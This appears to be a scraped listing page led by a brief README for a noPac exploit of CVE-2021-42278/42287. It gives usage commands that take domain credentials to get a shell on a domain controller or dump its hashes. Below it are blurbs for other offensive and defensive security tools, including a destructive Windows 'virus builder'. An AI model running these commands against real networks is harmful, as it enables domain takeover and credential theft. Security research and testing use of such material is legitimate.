Exploiting CVE-2021-42278 and CVE-2021-42287
原项目noPac在实现上可能有点问题,导致在本地没有打通,于是参考sam-the-admin项目进行修改。
pip3 install -r requirements.txt
# GetShell
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -shell
# DumpHash
python3 exp.py "domain/Username:Passw0rd" -dc-ip 192.168.0.254 -dump
https://github.com/cube0x0/noPac
https://github.com/WazeHell/sam-the-admin
OSINT Cybersecurity Tools Welcome to the World of OSINT: An ongoing collection of awesome tools and frameworks, best security software practices, libr
介绍 对于需要使用 Rogue Mysql Server 的漏洞来说,若想批量检测这种漏洞的话需要自备一个服务器。并且我常用的Rogue Mysql Server 脚本 不支持动态更改读取文件名、不支持远程用户访问读取结果、不支持批量化检测网站。于是乎萌生了这个小脚本的想法 Rogue-MySql-
CVE-2022-21907 - Double Free in http.sys driver Summary An unauthenticated attacker can send an HTTP request with an "Accept-Encoding" HTTP request he
A denial of service (DoS) vulnerability (CVE-2021-36798) was found in Cobalt Strike. The vulnerability was fixed in the scope of the 4.4 release. More
Argus Welcome to Argus, a OSINT tool coded in python. Disclaimer I Am not responsible what you do with the information that is given to you by my tool
Kunyu(坤舆) - More efficient corporate asset collection English | 中文文档 0x00 Introduce Tool introduction Kunyu (kunyu), whose name is taken from , is act
Salesforce Recon and Exploitation Toolkit Salesforce Recon and Exploitation Toolkit Usage python3 main.py URL References Announcement Blog - https:/
Virus-Builder - This tool will generate a virus that can only destroy Windows computer. You can also configure to auto run in usb drive
SpaceSiren SpaceSiren is a honey token manager and alert system for AWS. With this fully serverless application, you can create and manage honey token
Tools-Spartan This is a program that makes it easy for you to download and install tools used in Kali Linux, there are tons of tools available.
Log4j2-intranet-scan ⚠️ 免责声明 本项目仅面向合法授权的企业安全建设行为,在使用本项目进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权 如您在使用本项目的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任 在使用本项目前,请您务
python-proxy-server This is a proxy server ❤️ application written in python ❤️ for trial purposes. The purpose of the application; Connecting to Hacke
Bug Alert Bug Alert is a service for alerting security and IT professionals of h
Vuln Impact There was an unauthorized access vulnerability in Hadoop yarn ResourceManager. This vulnerability existed in Hadoop yarn, the core compone
A Python3 and a BASH PoC for CVE-2021-4034 by Kim Schulz
HashDB IDA Plugin Malware string hash lookup plugin for IDA Pro. This plugin connects to the OALABS HashDB Lookup Service. Adding New Hash Algorithms
ClickJackPoc This tool will help you automate finding Clickjacking Vulnerability by just passing a file containing list of Targets . Once the Target i
A tool to find good RCE From my series: A powerful Burp extension to make bounties rain
Pestilence - The Malware Database [] Screenshot Pestilence is a project created to make the possibility of malware analysis open and available to the
Autoflow - Windows Stack Based Auto Buffer Overflow Exploiter Autoflow is a tool that exploits windows stack based buffer overflow automatically.
7 Jul 01, 2022
6 May 17, 2022
71 Dec 22, 2022
104 Nov 09, 2022
2 Mar 20, 2022
772 Jan 05, 2023
81 Dec 23, 2022
16 Dec 30, 2022
287 Nov 09, 2022
1 Nov 10, 2021
16 Dec 19, 2022
2 Dec 27, 2021
208 Dec 15, 2022
25 Nov 24, 2022
16 Sep 06, 2022
237 Dec 21, 2022
24 Dec 19, 2022
52 Dec 16, 2022
47 Dec 21, 2022
19 Dec 22, 2022